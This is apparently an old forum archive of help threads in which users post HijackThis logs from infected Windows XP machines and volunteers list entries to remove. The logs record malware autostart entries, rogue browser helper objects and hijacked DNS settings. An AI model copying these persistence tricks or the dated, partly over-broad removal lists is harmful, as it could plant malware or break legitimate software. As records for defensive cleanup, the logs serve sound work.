O2 - BHO: BigMeanGorilla.MadAsHell - {FBD2EBD0-E6DF-456E-B300-A4D10A90C683} - C:\WINDOWS\System32\{FBD2EBD0-E6DF-456E-B300-A4D10A90C683}.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: Search - {F64A1646-5CF5-EDF5-25E9-D11E790941AD} - C:\WINDOWS\ufcygdzo.dll
O4 - HKLM\..\Run: [Jumbo Updater] C:\WINDOWS\System32\jumb.exe
O4 - HKLM\..\Run: [thrbfzfA] C:\WINDOWS\thrbfzfA.exe
O4 - HKLM\..\Run: [{99-93-36-68-ZN}] C:\WINDOWS\system32\rkdsregp.exe CORN001
O4 - HKLM\..\Run: [cfgmgr52] RunDLL32.EXE C:\WINDOWS\msbk32.dll,DllRun
O4 - HKLM\..\Run: [win32100-207031004] C:\WINDOWS\win32100-207031004.exe
O4 - HKLM\..\Run: [TheMonitor] C:\WINDOWS\SYS99.exe
O4 - HKCU\..\Run: [Qipr] C:\WINDOWS\System32\w?nword.exe
O4 - Startup: Zeno.lnk = C:\WINDOWS\system32\swinlsap.exe
O4 - Startup: Z_Start.lnk = C:\WINDOWS\system32\dwdsregt.exe
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O16 - DPF: {05D44720-58E3-49E6-BDF6-D00330E511D3} (StagingUI Object) - http://zone.msn.com/binFrameWork/v10/StagingUI.cab40641.cab
O16 - DPF: {1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB} - http://ak.imgfarm.com/images/nocache/funwebproducts/ei/PopularScreenSaversFWBInitialSetup1.0.0.15.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {3AF4DACE-36ED-42EF-9DFC-ADC34DA30CFF} (PatchInstaller.Installer) - file://F:\content\include\XPPatchInstaller.CAB
O16 - DPF: {3BB54395-5982-4788-8AF4-B5388FFDD0D8} (ZoneBuddy Class) - http://zone.msn.com/BinFrameWork/v10/ZBuddy.cab32846.cab
O16 - DPF: {5736C456-EA94-4AAC-BB08-917ABDD035B3} (ZonePAChat Object) - http://zone.msn.com/binframework/v10/ZPAChat.cab32846.cab
O16 - DPF: {809A6301-7B40-4436-A02C-87B8D3D7D9E3} (ZPA_DMNO Object) - http://zone.msn.com/bingame/zpagames/zpa_dmno.cab41096.cab
O16 - DPF: {8B1BC605-C593-4865-8F5B-05517F0CD0BB} (MSSecurityAdvisorCD Class) - file://F:\Content\include\msSecUcd.cab
O16 - DPF: {8FCDF9D9-A28B-480F-8C3D-581F119A8AB8} - http://static.zangocash.com/cab/Zango/ie/bridge-c8.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://cdn2.zone.msn.com/binFramework/v10/ZIntro.cab34246.cab
O16 - DPF: {C02226EB-A5D7-4B1F-BD7E-635E46C2288D} (Toontown Installer ActiveX Control) - http://a.download.toontown.com/sv1.0.15.44/ttinst.cab
O16 - DPF: {CC32D4D8-2A0B-4CEB-B105-C9B968379105} (CGameManagerCtrl Object) - http://www.disney.go.com/games/downloads/gamemanager/DIGGameManager.cab
O16 - DPF: {D54160C3-DB7B-4534-9B65-190EE4A9C7F7} (SproutLauncherCtrl Class) - http://zone.msn.com/bingame/feed/default/SproutLauncher.cab
O16 - DPF: {DA2AA6CF-5C7A-4B71-BC3B-C771BB369937} (StadiumProxy Class) - http://zone.msn.com/binframework/v10/StProxy.cab41227.cab
O18 - Filter: text/html - (no CLSID) - (no file)
O23 - Service: Network Monitor - Unknown owner - C:\Program Files\Network Monitor\netmon.exe
O23 - Service: Windows Overlay Components - Unknown owner - C:\WINDOWS\thrbfzf.exe (file missing) gliss......  Ok .......the first thing you should do is install a anti virus......I cant believe your on-line with out one .........Now then ....that would probably explain all the questionable entries in your hijack log ......  The next thing I would do is D/l service pack 2 and the other critical updates ........

So mark for removal the following :
O2 - BHO: (no name) - {6001CDF7-6F45-471b-A203-0225615E35A7} - C:\WINDOWS\DH.dll

O2 - BHO: (no name) - {7BC87158-55FB-3A77-DF75-3764B3B38F10} - C:\WINDOWS\ufcygdzo.dll

 O2 - BHO: (no name) - {8431AAA5-6F48-40CC-69B2-16F3BD4066C0} - C:\WINDOWS\System32\kaneomy.dll    

  O2 - BHO: (no name) - {C5AF2622-8C75-4dfb-9693-23AB7686A456} - C:\WINDOWS\DH.dll    
 
  O2 - BHO: SuperSecretServer.Shhh - {FB0FDDBA-27C2-441E-A4A6-7EC0E9F60E63} - C:\WINDOWS\System32\{FB0FDDBA-27C2-441E-A4A6-7EC0E9F60E63}.dll    
 
  O2 - BHO: BigMeanGorilla.MadAsHell - {FBD2EBD0-E6DF-456E-B300-A4D10A90C683} - C:\WINDOWS\System32\{FBD2EBD0-E6DF-456E-B300-A4D10A90C683}.dll  

O3 - Toolbar: Search - {F64A1646-5CF5-EDF5-25E9-D11E790941AD} - C:\WINDOWS\ufcygdzo.dll

O4 - HKLM\..\Run: [Jumbo Updater] C:\WINDOWS\System32\jumb.exe    

  O4 - HKLM\..\Run: [thrbfzfA] C:\WINDOWS\thrbfzfA.exe    

  O4 - HKLM\..\Run: [{99-93-36-68-ZN}] C:\WINDOWS\system32\rkdsregp.exe CORN001    

  O4 - HKLM\..\Run: [cfgmgr52] RunDLL32.EXE C:\WINDOWS\msbk32.dll,DllRun    

  O4 - HKLM\..\Run: [win32100-207031004] C:\WINDOWS\win32100-207031004.exe    

  O4 - HKLM\..\Run: [TheMonitor] C:\WINDOWS\SYS99.exe    

  O4 - HKCU\..\Run: [Qipr] C:\WINDOWS\System32\w?nword.exe    

  O4 - Startup: Zeno.lnk = C:\WINDOWS\system32\swinlsap.exe    
 
  O4 - Startup: Z_Start.lnk = C:\WINDOWS\system32\dwdsregt.exe  

O16 - DPF: {1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB} - http://ak.imgfarm.com/images/nocache/funwebproducts/ei/PopularScreenSaversFWBIni tialSetup1.0.0.15.cab

O16 - DPF: {8FCDF9D9-A28B-480F-8C3D-581F119A8AB8} - http://static.zangocash.com/cab/Zango/ie/bridge-c8.cab

O16 - DPF: {C02226EB-A5D7-4B1F-BD7E-635E46C2288D} (Toontown Installer ActiveX Control) - http://a.download.toontown.com/sv1.0.15.44/ttinst.cab    

  O16 - DPF: {CC32D4D8-2A0B-4CEB-B105-C9B968379105} (CGameManagerCtrl Object) - http://www.disney.go.com/games/downloads/gamemanager/DIGGameManager.cab  

 O18 - Filter: text/html - (no CLSID) - (no file)    
  
  O23 - Service: Network Monitor - Unknown owner - C:\Program Files\Network Monitor\netmon.exe    

  O23 - Service: Windows Overlay Components - Unknown owner - C:\WINDOWS\thrbfzf.exe (file missing)  

Now click "FIX MARKED and reboot

BTW ......   Quote

I thought I had it cleaned out several times but keeps comming back.
 what software do you use to clean out this crap....?

dl65  




Thanks for your reply dl65. I had tried using AdawareSE and the Yahoo antispyware tool. That didn't get me very far so I RAN adawareSE in safe mode and deleted some registry entries in the run section that I knew did'nt belong there. Things were fine for a few minutes but like I said it always found it's way back. I know Hijack this is a powerful tool for getting rid of these things but also have to UNDERSTAND what you are checking for removal. I'm not up on all that but I know where to come for good advice   I will definately take your advice on the sp2 and updates and get anantivirus app installed. Again thanks for the help.  By the way the computer infected is used by my 12 year old daughter and unfortunatly despite my preaching she will just click on about anything without a second thought.  All the more reason to protect it properly.

Spybot, AVG Free, CCleaner, and A2 come to mind as required items for this machine. gliss..... you have to understand that a unprotected pc can and usually does become infected with all sorts of nasties within minutes of being online .
I would strong suggest that you do a bit of boning up on nasties and how to avoid them .  And yes Hijackthis is a powerful tool ........but it does a great job .

dl65  Is it fixed?
[timestamp=1136437738] Quote
By the way the computer infected is used by my 12 year old daughter and unfortunatly despite my preaching she will just click on about anything without a second thought.

Make her user account "restricted." This will GREATLY lower the chance of her unintentionally installing something malcious, and it restricts the abilities of anything that does manage to get through.

with regardsYes, I did as dl65 said and it worked like a charm.  I will now take the rest of the advice offered here and get to work hardening the system against future threats. It sometimes takes a good "wake up" call like this to realize how important security is.  Thanks to dl65 and all who replied.
149.

Solve : slow internet - adsl lights blinking like crazy?

Answer»

There was also some suspicious ilt.exe running.. I have removed that, but still... internet is REALLY slow! Please help!

Logfile of HijackThis v1.99.1
Scan SAVED at 05:06:01, on 7/1/2006
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\SYSTEM32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Hand-Crafted Software\FreeProxy\FreeProxy.exe
C:\Program Files\NMapWin\bin\nmapserv.exe
C:\Program Files\Norton SystemWorks\Norton Utilities\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Real\RealPlayer\realplay.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\System32\RUNDLL32.EXE
C:\WINDOWS\SYSTEM32\USRmlnkA.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\WINDOWS\System32\sysmsvc.exe
C:\WINDOWS\SYSTEM32\USRshutA.exe
C:\WINDOWS\SYSTEM32\USRmlnkA.exe
C:\Program Files\AceLogix\StartupGuard\sg.exe
C:\WINDOWS\System32\win32oleupdate.exe
C:\PROGRA~1\NETSCAPE\NETSCAPE\NETSCP.EXE
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Documents and Settings\Leo H. Sano\Desktop\HijackThis.exe

R3 - URLSearchHook: (no name) - {00D6A7E7-4A97-456f-848A-3B75BF7554D7} - (no file)
N3 - Netscape 7: user_pref("browser.startup.homepage", ""); (C:\Documents and Settings\Leo H. Sano\Application Data\Mozilla\Profiles\default\0r2vt8qt.slt\prefs.js)
N3 - Netscape 7: user_pref("browser.search.defaultengine", "engine://C%3A%5CPROGRA%7E1%5CNETSCAPE%5CNETSCAPE%5Csearchplugins%5CSBWeb_06.src"); (C:\Documents and Settings\Leo H. Sano\Application Data\Mozilla\Profiles\default\0r2vt8qt.slt\prefs.js)
O2 - BHO: CompSegIB - {2E3C3651-B19C-4DD9-A979-901EC3E930AF} - C:\WINDOWS\System32\scpsssh2.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: G-Buster Browser Defense Unibanco - {C41A1C0E-EA6C-11D4-B1B8-444553540008} - C:\WINDOWS\Downloaded Program Files\gbiehuni.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\realplay.exe SYSTEMBOOTHIDEPLAYER
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [USRpdA] C:\WINDOWS\SYSTEM32\USRmlnkA.exe RunServices \Device\3cpipe-USRpdA
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\HP\HP Software Update\HPWuSchd2.exe"
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [MsWindows SysDate] sysmsvc.exe
O4 - HKLM\..\Run: [Services] C:\iexplorer.exe
O4 - HKLM\..\Run: [Win32 Update] C:\WINDOWS\System32\win32oleupdate.exe
O4 - HKLM\..\RunServices: [MsWindows SysDate] sysmsvc.exe
O4 - HKCU\..\Run: [Startup Guard] C:\Program Files\AceLogix\StartupGuard\sg.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: ICQ Pro - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra button: EmpirePoker - {77E68763-4284-41d6-B7E7-B6E1F053A9E7} - C:\Program Files\EmpirePoker\EmpirePoker.exe
O9 - Extra 'Tools' menuitem: EmpirePoker - {77E68763-4284-41d6-B7E7-B6E1F053A9E7} - C:\Program Files\EmpirePoker\EmpirePoker.exe
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Royal Vegas Poker - {FA4904B4-1FAF-4afd-886C-C19D2297BA62} - C:\Program Files\royalvegasMPP\MPPoker.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/viewers/ipixx.cab
O16 - DPF: {2E3C3651-B19C-4DD9-A979-901EC3E930AF} (ssh2 Class) - https://cpib.bradesco.com.br/scpsssh2.cab
O16 - DPF: {E37CB5F0-51F5-4395-A808-5FA49E399008} (GbPluginObj Class) - https://clickbanking.unibanco.com.br/GbPlugin/cab/GbPluginUni.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{1C5DB328-E72E-4B84-95CD-900E110CA7DD}: NameServer = 200.175.5.139,200.199.252.68
O17 - HKLM\System\CCS\Services\Tcpip\..\{EA8D846F-4FC3-4C64-B747-1BAF257A30B9}: NameServer = 200.175.5.139
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: cvcworking SETTING (cvcWork) - Unknown owner - C:\WINDOWS\syscvhost.exe
O23 - Service: Free Proxy Service (FreeProxy) - Hand-Crafted Software - C:\Program Files\Hand-Crafted Software\FreeProxy\FreeProxy.exeO23 - Service: Virtual IR COM Port, Service Program (IrCOMM2kSvc) - Jan Kiszka - C:\WINDOWS\System32\ircomm2k.exe
O23 - Service: NMap - Unknown owner - C:\Program Files\NMapWin\bin\nmapserv.exe
O23 - Service: Norton Unerase Protection (NProtectService) - Symantec Corporation - C:\Program Files\Norton SystemWorks\Norton Utilities\NPROTECT.EXE
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\System32\HPZipm12.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Unknown owner - %ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini (file missing)
O23 - Service: Windows Update Manager (Update Manager ) - Unknown owner - C:\WINDOWS\System32\updmgr.exeWhat do you use for spyware/adware/virus protection? I see Norton mentioned. Are all of these protections up to date and being used?

Are you rnning XP with SP2?nope, it is not uptodate. could you recommend some free softwares for me to run and try to solve this problem? thanks!SP2 if running XP

MS Antispyware Beta
Spybot
AdAware
CCleaner
Ewido

All are free. Just google for them.

If you are using Norton, make sure it is up to date also. If not AVG Free is wonderful.

You really need an arsenal of things if you are using Windows on the Internet. Some do some things better than others. One antivirus is enough however, whatever you decide on.

CAUTION - LINUX PLUG

Of course with Linux you need none of these things at all!

leleo80..... You machine is infected with at least the W32.Spybot.FCD WORM

Before you go any further .....we need to know if your ANTI virus is up to date as far as the subscription ( has it expired ) and do you have the latest virus definitions ?
I also notice that you are not running XP service pack 2......AND you are using a outdated version of Internet Explorer ........ Is there any reason for this ?

Shut down your system restore

Open your hijackthis program .....let it generate a new log and then mark for removal the following:
R3 - URLSearchHook: (no name) - {00D6A7E7-4A97-456f-848A-3B75BF7554D7} - (no file)

O2 - BHO: CompSegIB - {2E3C3651-B19C-4DD9-A979-901EC3E930AF} - C:\WINDOWS\System32\scpsssh2.dll

O2 - BHO: G-Buster Browser Defense Unibanco - {C41A1C0E-EA6C-11D4-B1B8-444553540008} - C:\WINDOWS\Downloaded Program Files\gbiehuni.dll

O4 - HKLM\..\Run: [MsWindows SysDate] sysmsvc.exe

O4 - HKLM\..\RunServices: [MsWindows SysDate] sysmsvc.exe

O9 - Extra button: EmpirePoker - {77E68763-4284-41d6-B7E7-B6E1F053A9E7} - C:\Program Files\EmpirePoker\EmpirePoker.exe    

O9 - Extra 'Tools' menuitem: EmpirePoker - {77E68763-4284-41d6-B7E7-B6E1F053A9E7} - C:\Program Files\EmpirePoker\EmpirePoker.exe  

O9 - Extra button: Royal Vegas Poker - {FA4904B4-1FAF-4afd-886C-C19D2297BA62} - C:\Program Files\royalvegasMPP\MPPoker.exe

O16 - DPF: {2E3C3651-B19C-4DD9-A979-901EC3E930AF} (ssh2 Class) - https://cpib.bradesco.com.br/scpsssh2.cab

O16 - DPF: {E37CB5F0-51F5-4395-A808-5FA49E399008} (GbPluginObj Class) - https://clickbanking.unibanco.com.br/GbPlugin/cab/GbPluginUni.cab    
 
O17 - HKLM\System\CCS\Services\Tcpip\..\{1C5DB328-E72E-4B84-95CD-900E110CA7DD}: NameServer = 200.175.5.139,200.199.252.68    
 
O17 - HKLM\System\CCS\Services\Tcpip\..\{EA8D846F-4FC3-4C64-B747-1BAF257A30B9}: NameServer = 200.175.5.139  

O23 - Service: cvcworking setting (cvcWork) - Unknown owner - C:\WINDOWS\syscvhost.exe    

O23 - Service: Free Proxy Service (FreeProxy) - Hand-Crafted Software - C:\Program Files\Hand-Crafted Software\FreeProxy\FreeProxy.exe  

Now click on FIX MARKED ............and the REBOOT .......then open hijackthis and run another scan and post it here please .

dl65  





150.

Solve : Need assistance with a virus I've got.?

Answer»

I'm new here so I want to first say hello.  I'm an intermediate computer user but this virus I have has got me stumped.  According to Norton it's the Trojan.Zlob virus.  I've GONE through the removal for this particular virus step-by-step twice.  The first time I ran the virus scan I had two infected files:
 
hp4c5a.tmp, and
ld48df.tmp
 
both of which could not be accessed, quarantined, or deleted.  

When I got to the registry section of the removal PROCESS, most of the registry KEYS they wanted me to browse to and delete were not present.  Ok, now I'm getting pissed.....lol.  I was able to delete the two infected files because with the removal process you had to be in Safe Mode.  So I finished the steps (well the ones I could), and restarted normally.  This time Norton detects yet another two infected files, with the same virus name, Trojan.Zlob.  The weird part is that the names of these files were close to the one mentioned above.  They were:
 
hp4DA4.tmp, and
ld4A0B.tmp.
 
At this point I decided not to go through the removal process assuming that the same thing would happen.  
 
If anyone of you has experienced this and knows how to successfully remove this virus, please let me know.  My email address is [email protected]  I hope that I've described my issue well, but if NEED be I have more INFORMATION.  Thank you.
Ewido is very good at removing trojans.
http://www.ewido.net/en/

Tip: Turn off System Restore when you remove it.Thank you for the advice.  Now if this program does not do the trick, would the next step be to wipe the HD?? :-?No, and I'd be very surprised of Ewido doesn't remove it for you.Alright, cool.  Yeah with your first message, I did have system restore turned off.  Does this make the situation worse?Relax, it's only a bug.
Turning off system restore is better as is scanning in safe mode.Where were those files located? Have you cleaned out temporary files?

with regardsThey were located in the System32 folder.  I did not try to delete my temporary files.....just the internet temp. files.